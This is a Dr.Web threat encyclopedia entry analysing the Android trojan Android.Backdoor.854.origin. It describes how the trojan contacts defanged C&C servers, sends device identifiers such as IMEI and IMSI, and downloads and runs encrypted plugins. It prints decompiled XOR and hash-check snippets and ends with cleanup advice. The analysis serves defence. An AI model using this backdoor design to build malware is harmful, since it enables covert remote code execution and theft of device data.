FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Android.Backdoor.854.origin

Added to the Dr.Web virus database: 2022-07-22

Virus description added:

  • SHA1: c747a3a901f3076c504dc513bfcf64e8d29600ac (PrivteProvide.jar)

Description

Android.Backdoor.854.origin is a trojan application for Android-powered devices. It is a .DEX file placed into a .JAR archive. This archive is copied into the targeted apps’ directories by other trojans, particularly Android.BackDoor.3104. Android.Backdoor.854.origin’s main function is to download and launch additional malicious modules in the context of the targeted programs.

Operating routine

The com.androidx.v13.PrivteProvide.getInstance(String) entry point is used to start the trojan. When launched, at short time intervals it tries to obtain an instance of the android.app.Application class until it succeeds.

Android.Backdoor.854.origin creates the following subdirectories in the directories containing the files of the targeted apps:

  • .cache/pt—encrypted plugin files are downloaded into this directory;
  • .cache/pn—decrypted plugins are saved into this directory;
  • .cache/pd—in this directory, the optimized versions of plugins are saved. They are created by the operating system after the original versions are loaded through the DexClassLoader class.

Next, the trojan launches the downloaded plugins from the pn directory. The plugins are received upon connecting to one of the C&C servers.

The connection with the C&C server

Android.Backdoor.854.origin sends a request to one of the assigned C&C servers, connecting to them in order, starting with the first one. If it is unable to establish a connection with the first server within 24 hours, the trojan proceeds to the next one. Information about the last successful connection is stored in the configuration file sp_brois_settings in the successTime variable.

The list of C&C server URLs is as follows:

  • hxxp[:]//api[.]genetence[.]com:8300/pl2
  • hxxp[:]//api.[]matriature[.]com:8300/pl2
  • hxxp[:]//api[.]miretic[.]com:8300/pl2
  • hxxp[:]//api[.]sensfaction[.]com:8300/pl2
  • hxxp[:]//45[.]33.61[.]62:8300/pl2

The first request is executed 2 minutes after the thread is launched, and the request is repeated in an infinite loop cycle with an interval of 60 minutes. At the beginning, the first URL from the list is used. If the connection attempt fails within 24 hours, the trojan proceeds to the next URL.

The following parameters are used in the request:

Request parameter Description
a_l Android SDK version
a_i android_id—the unique device ID
a_v Application version name
a_c Application version code
model Device model
brand Device brand
ver A v3 string
pack Package name
imsi IMSI
imei IMEI
res Screen resolution
sys If the target application is a system app (if yes, the 1 value is sent; if no, the 0 value is sent)
fr A string sent when the trojan starts
ctm Current time
pft The time elapsed since the start of the trojan module
sn The md5 hash from the concatenation of the values of the a_l + a_i + a_v + a_c + "oignuowwg" + ctm parameters

The data sent to and received from the C&C server is encrypted with XOR:


public static byte[] xor(byte[] data) {
    int i;
    for(i = 0; i < data.length; ++i) {
       data[i] = (byte)(data[i] ^ 0x24D3);
    }
    return data;
}

If the server returns a status code with the value 200, the response from it must contain JSON and a particular hash in order for the trojan to execute the command to download and launch plugins:


JSONObject json = new JSONObject(response_body);
String s = json.getString("s");
if(Hash.md5(json.getString("u") + "&zhanghui18888").equals(s)) {
    .... //do work
}

The JSON that the C&C server sends back contains a plugin array where for each plugin the plugin_file, plugin_url, and plugin_size fields are indicated.

After receiving the parameters, the trojan deletes from the /.cache/pn directory the preexisting plugins, which are missing in the command. Next, the plugins specified in the command and which are no longer present on the device, are downloaded into the /.cache/pt catalog. The plugins are encrypted with XOR:


private static byte[] xor(byte[] data) {
    byte[] out = new byte[data.length];
    int i;
    for(i = 0; i < data.length; ++i) {
        out[i] = (byte)(data[i] ^ 0xB9);
    }
    return out;
}

The trojan decrypts them and places them into the /.cache/pn directory.

After that, all the plugins that have been copied into the /.cache/pn catalog are loaded into the memory and launched in the context of the attacked applications. Depending on their functionality, such plugins can perform various malicious actions.

If the C&C server returns a status code with the value 206, Android.Backdoor.854.origin writes the variables "successFlag" = 1 and "successTime" = System.currentTimeMillis() to the sp_brois_settings configuration file, which means that the request to the C&C server was successful. The trojan performs a similar action when it receives the code 200. When the code 206 is received, the trojan does not download the plugins.

Indicators of compromise

More details on Android.BackDoor.3104

News about the trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

© Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies